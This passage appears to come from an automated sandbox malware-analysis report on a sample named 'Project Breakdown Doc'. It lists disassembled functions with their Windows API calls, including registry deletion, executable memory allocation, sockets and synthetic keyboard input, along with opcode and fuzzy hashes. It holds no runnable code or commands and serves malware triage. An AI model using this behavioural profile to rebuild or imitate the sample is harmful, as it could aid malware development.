                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                  • API String ID: 2574300362-3689287502
                                                  • Opcode ID: 91026215a55d69429db419feb53ac74e885e22d8d965bf6f11fb76ad60e3703d
                                                  • Instruction ID: 2908e2b7f14647fe522fd2cff9efcc0592ec30b41e6fe0116859f95caf57d0ae
                                                  • Opcode Fuzzy Hash: 91026215a55d69429db419feb53ac74e885e22d8d965bf6f11fb76ad60e3703d
                                                  • Instruction Fuzzy Hash: F7D01731910713CFD7209F31D808B1AB6E9BF15352B25C93ED4A6D6250EB70D880CA50
                                                  Function 00CC1072 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(advapi32.dll,?,00CC12C1), ref: 00CC1080
                                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00CC1092
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                  • API String ID: 2574300362-4033151799
                                                  • Opcode ID: fa93565b8d0f27538adc9b6d51a8e3aab9142cf08eb160dfc84e74d382726e0b
                                                  • Instruction ID: 31ee27dc7a31e39b377b16cc011dd7fc1c475569bef19da39f6e6b3df5806d3b
                                                  • Opcode Fuzzy Hash: fa93565b8d0f27538adc9b6d51a8e3aab9142cf08eb160dfc84e74d382726e0b
                                                  • Instruction Fuzzy Hash: 2CD01731520712CFD7209F36D818F2E76E5AF06361F198C3EE89ADA150E770C8C0CA51
                                                  Function 00CB93F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00CB9009,?,00CCF910), ref: 00CB9403
                                                  • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00CB9415
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: GetModuleHandleExW$kernel32.dll
                                                  • API String ID: 2574300362-199464113
                                                  • Opcode ID: 87761159e41be686cd9ffb994f9b2d094e5aacf8e90bdf0387b1f8b7b399db80
                                                  • Instruction ID: 6f2fbaa55450d57a80832f244d5a992b57922d2eca43e80dafd75a23db5b1463
                                                  • Opcode Fuzzy Hash: 87761159e41be686cd9ffb994f9b2d094e5aacf8e90bdf0387b1f8b7b399db80
                                                  • Instruction Fuzzy Hash: 6ED0C730540323CFC7208F30CA08B4ABAE6AF00341F04C83EE596C2550E770C881CA10
                                                  Function 00C976C5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f752c908d2429a7a798546e200f001162267f284dedda00b9fb127b9affb4e31
                                                  • Instruction ID: a9c4d11b738a736c8a688e7079d88166b7f84e555b0b6102b05d68d14aa0721a
                                                  • Opcode Fuzzy Hash: f752c908d2429a7a798546e200f001162267f284dedda00b9fb127b9affb4e31
                                                  • Instruction Fuzzy Hash: FAC17C74A15216EFCF14CF98C888EAEB7B5FF48714B118698E815EB251D730EE81DB90
                                                  Function 00CBE33E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CharLowerBuffW.USER32(?,?), ref: 00CBE3D2
                                                  • CharLowerBuffW.USER32(?,?), ref: 00CBE415
                                                    • Part of subcall function 00CBDAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00CBDAD9
                                                  • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00CBE615
                                                  • _memmove.LIBCMT ref: 00CBE628
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: BuffCharLower$AllocVirtual_memmove
                                                  • String ID:
                                                  • API String ID: 3659485706-0
                                                  • Opcode ID: 2cae8fd3a1a0c213d393e62a0bfe4d85b7a47127118e07cca013f5f41feedd8e
                                                  • Instruction ID: 8cec8278af64dd872772b99d0679a8826dbf74294349c94cbfdbaa2453f632ab
                                                  • Opcode Fuzzy Hash: 2cae8fd3a1a0c213d393e62a0bfe4d85b7a47127118e07cca013f5f41feedd8e
                                                  • Instruction Fuzzy Hash: DFC14B716083119FCB14DF68C4809AABBE4FF89718F14896DF8999B351D731EA46CF82
                                                  Function 00CB83A8 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CoInitialize.OLE32(00000000), ref: 00CB83D8
                                                  • CoUninitialize.OLE32 ref: 00CB83E3
                                                    • Part of subcall function 00C9DA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00C9DAC5
                                                  • VariantInit.OLEAUT32(?), ref: 00CB83EE
                                                  • VariantClear.OLEAUT32(?), ref: 00CB86BF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                  • String ID:
                                                  • API String ID: 780911581-0
                                                  • Opcode ID: 71d5d84211f8ccdfff880c709e04a48646b0e46984619394009df3192845cb42
                                                  • Instruction ID: ac68d346f52fbb7c0360ddc8df519cd2b2dc62e6918b91d91a5c02e4da32524f
                                                  • Opcode Fuzzy Hash: 71d5d84211f8ccdfff880c709e04a48646b0e46984619394009df3192845cb42
                                                  • Instruction Fuzzy Hash: 9AA136752047119FDB10DF25C895B6AB7E8FF88314F148449FA9A9B3A1CB30ED08DB52
                                                  Function 00C97A78 Relevance: 6.2, APIs: 4, Instructions: 231COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00CD2C7C,?), ref: 00C97C32
                                                  • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00CD2C7C,?), ref: 00C97C4A
                                                  • CLSIDFromProgID.OLE32(?,?,00000000,00CCFB80,000000FF,?,00000000,00000800,00000000,?,00CD2C7C,?), ref: 00C97C6F
                                                  • _memcmp.LIBCMT ref: 00C97C90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: FromProg$FreeTask_memcmp
                                                  • String ID:
                                                  • API String ID: 314563124-0
                                                  • Opcode ID: a47a81126703129d8ddf8be99a8f86b4fb0c94403ebd5565b2772ffe126bbb32
                                                  • Instruction ID: d24083a9c2895a918ac2f29d936e694ef20b1579bf3d17d28f530ad0d6e8af92
                                                  • Opcode Fuzzy Hash: a47a81126703129d8ddf8be99a8f86b4fb0c94403ebd5565b2772ffe126bbb32
                                                  • Instruction Fuzzy Hash: DA811771A11109EFCF04DF94C988EEEB7B9FF89315F204198E516AB250DB71AE06CB60
                                                  Function 00C96DF3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Variant$AllocClearCopyInitString
                                                  • String ID:
                                                  • API String ID: 2808897238-0
                                                  • Opcode ID: f8f1bcc09899b58df0ae6c4823e8b1badc766615860eb14f03acc8d614a837d4
                                                  • Instruction ID: 737f44e8bd5c4885f62b69ff19a739538d0aa5ba50b3c1debc6cbafef2e23a4f
                                                  • Opcode Fuzzy Hash: f8f1bcc09899b58df0ae6c4823e8b1badc766615860eb14f03acc8d614a837d4
                                                  • Instruction Fuzzy Hash: C85193306183029BDF24AFA6D899B7EB3E5BF48310F20991FE556DB2D1DB709940AB11
                                                  Function 00CA97E5 Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C45045: _fseek.LIBCMT ref: 00C4505D
                                                    • Part of subcall function 00CA99BE: _wcscmp.LIBCMT ref: 00CA9AAE
                                                    • Part of subcall function 00CA99BE: _wcscmp.LIBCMT ref: 00CA9AC1
                                                  • _free.LIBCMT ref: 00CA992C
                                                  • _free.LIBCMT ref: 00CA9933
                                                  • _free.LIBCMT ref: 00CA999E
                                                    • Part of subcall function 00C62F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00C69C64), ref: 00C62FA9
                                                    • Part of subcall function 00C62F95: GetLastError.KERNEL32(00000000,?,00C69C64), ref: 00C62FBB
                                                  • _free.LIBCMT ref: 00CA99A6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                  • String ID:
                                                  • API String ID: 1552873950-0
                                                  • Opcode ID: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                                                  • Instruction ID: d0a129e4f8fd23d4eb16b8e66c41b5b88c122722bf5872911bef0931da5d7775
                                                  • Opcode Fuzzy Hash: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                                                  • Instruction Fuzzy Hash: 4A516BB1D04219AFDF249F64CC81A9EBBB9FF49304F1004AEB209A7281DB315A80DF59
                                                  Function 00CC9A63 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetWindowRect.USER32(017ADF10,?), ref: 00CC9AD2
                                                  • ScreenToClient.USER32(00000002,00000002), ref: 00CC9B05
                                                  • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00CC9B72
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Window$ClientMoveRectScreen
                                                  • String ID:
                                                  • API String ID: 3880355969-0
                                                  • Opcode ID: d210e49c1882ea154fc6f89007f07c4ffc71123ab0b1efed738c091e1eb350a1
                                                  • Instruction ID: a7f3c9ff1d2e55dd8909f1a0c7f6595c7301b8fd038af69631a1e266e9384487
                                                  • Opcode Fuzzy Hash: d210e49c1882ea154fc6f89007f07c4ffc71123ab0b1efed738c091e1eb350a1
                                                  • Instruction Fuzzy Hash: 55511C35A00209AFCF24DF58D895EAE7BB6FB44720F14815DF8259B2A0D730EE51DB50
                                                  Function 00CB6CBD Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • socket.WSOCK32(00000002,00000002,00000011), ref: 00CB6CE4
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00CB6CF4
                                                    • Part of subcall function 00C49997: __itow.LIBCMT ref: 00C499C2
                                                    • Part of subcall function 00C49997: __swprintf.LIBCMT ref: 00C49A0C
                                                  • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00CB6D58
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00CB6D64
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$__itow__swprintfsocket
                                                  • String ID:
                                                  • API String ID: 2214342067-0
                                                  • Opcode ID: 94aad69eadeac14ecdacff270cafe6f9b96a0aac1e54d32d2d0258745159c89d
                                                  • Instruction ID: 1bd9d707f03891599c4d2e2ffb4e89b6d54a182ae4057c255c17c506b91b97f4
                                                  • Opcode Fuzzy Hash: 94aad69eadeac14ecdacff270cafe6f9b96a0aac1e54d32d2d0258745159c89d
                                                  • Instruction Fuzzy Hash: E8419E74740210AFEB20AF24DC86F7E77E9EB48B10F448058FA599B3D2DA759D01AB91
                                                  Function 00CB672D Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00CCF910), ref: 00CB67BA
                                                  • _strlen.LIBCMT ref: 00CB67EC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: _strlen
                                                  • String ID:
                                                  • API String ID: 4218353326-0
                                                  • Opcode ID: 4c517a0ed46c49da54b6b3024fd0037696a723d3bb946bd67bce48000c286435
                                                  • Instruction ID: 15fd7ada8ea5906ec0bb628a0196257b727765d37eb5da4cf97d5183a25a51a3
                                                  • Opcode Fuzzy Hash: 4c517a0ed46c49da54b6b3024fd0037696a723d3bb946bd67bce48000c286435
                                                  • Instruction Fuzzy Hash: 2141A271A00104ABCB14EBA5DCC5FEEB3A9EF48310F148169F8169B2D2DF34AE05EB50
                                                  Function 00CABA5F Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00CABB09
                                                  • GetLastError.KERNEL32(?,00000000), ref: 00CABB2F
                                                  • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00CABB54
                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00CABB80
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: CreateHardLink$DeleteErrorFileLast
                                                  • String ID:
                                                  • API String ID: 3321077145-0
                                                  • Opcode ID: 84ee6d50fb7a69bf9b3baf2816fe20fde197f999bb96daaac994acff2ab81875
                                                  • Instruction ID: e608f6ce379e77a626cad6bd76c9a4bafc2d751867fd5aa71b6c7b8b7e20e099
                                                  • Opcode Fuzzy Hash: 84ee6d50fb7a69bf9b3baf2816fe20fde197f999bb96daaac994acff2ab81875
                                                  • Instruction Fuzzy Hash: 4F412639600621DFCB10EF15C584A5EBBE1FF99324B098498E84A9B762CB34FD01EB91
                                                  Function 00CC8AC0 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00CC8B4D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: InvalidateRect
                                                  • String ID:
                                                  • API String ID: 634782764-0
                                                  • Opcode ID: a9bcbc29b5cd9e49fba4337e7b341700fd04f94d0653b1204f44e8ccf828ea18
                                                  • Instruction ID: a6d603a75979495bd9bd6f2d53f3f4a08ce7c6c9b083875296c3b58f53bbfd07
                                                  • Opcode Fuzzy Hash: a9bcbc29b5cd9e49fba4337e7b341700fd04f94d0653b1204f44e8ccf828ea18
                                                  • Instruction Fuzzy Hash: EB3181B4600208BFEF209B18CCA5FAB77A5EB05310F64455EFA65D72E1CE30AE589661
                                                  Function 00CCADF1 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ClientToScreen.USER32(?,?), ref: 00CCAE1A
                                                  • GetWindowRect.USER32(?,?), ref: 00CCAE90
                                                  • PtInRect.USER32(?,?,00CCC304), ref: 00CCAEA0
                                                  • MessageBeep.USER32(00000000), ref: 00CCAF11
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Rect$BeepClientMessageScreenWindow
                                                  • String ID:
                                                  • API String ID: 1352109105-0
                                                  • Opcode ID: 7e4339c98bf145a7b5d8b57e786edc77d7e0f0420ecefc96333e2d4c686371bb
                                                  • Instruction ID: 7dbf014a136073950c88f1cb072fb5f8eb195847dd563287d62d609ab16f45c3
                                                  • Opcode Fuzzy Hash: 7e4339c98bf145a7b5d8b57e786edc77d7e0f0420ecefc96333e2d4c686371bb
                                                  • Instruction Fuzzy Hash: 2E416970A002199FCB11CF99C888FA9BBF5FB48344F1481ADE818CB351D730E952DBA2
                                                  Function 00CA0FE6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00CA1037
                                                  • SetKeyboardState.USER32(00000080,?,00000001), ref: 00CA1053
                                                  • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00CA10B9
                                                  • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00CA110B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: KeyboardState$InputMessagePostSend
                                                  • String ID:
                                                  • API String ID: 432972143-0
                                                  • Opcode ID: ad296a44e7b908bfa5ceed6e2b020f34bf17ae3c8db76bfd566cc2d7710be599
                                                  • Instruction ID: 29f775499ef9cc25a9194812058bde40552ff8301d19b2032f44967611d2deee
                                                  • Opcode Fuzzy Hash: ad296a44e7b908bfa5ceed6e2b020f34bf17ae3c8db76bfd566cc2d7710be599
                                                  • Instruction Fuzzy Hash: D9314B30E4469AAEFB308B66CC05BFDBBA9AB46318F1C421AE9A0521D1C3758EC19751
                                                  Function 00CA1121 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00CA1176
                                                  • SetKeyboardState.USER32(00000080,?,00008000), ref: 00CA1192
                                                  • PostMessageW.USER32(00000000,00000101,00000000), ref: 00CA11F1
                                                  • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00CA1243
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
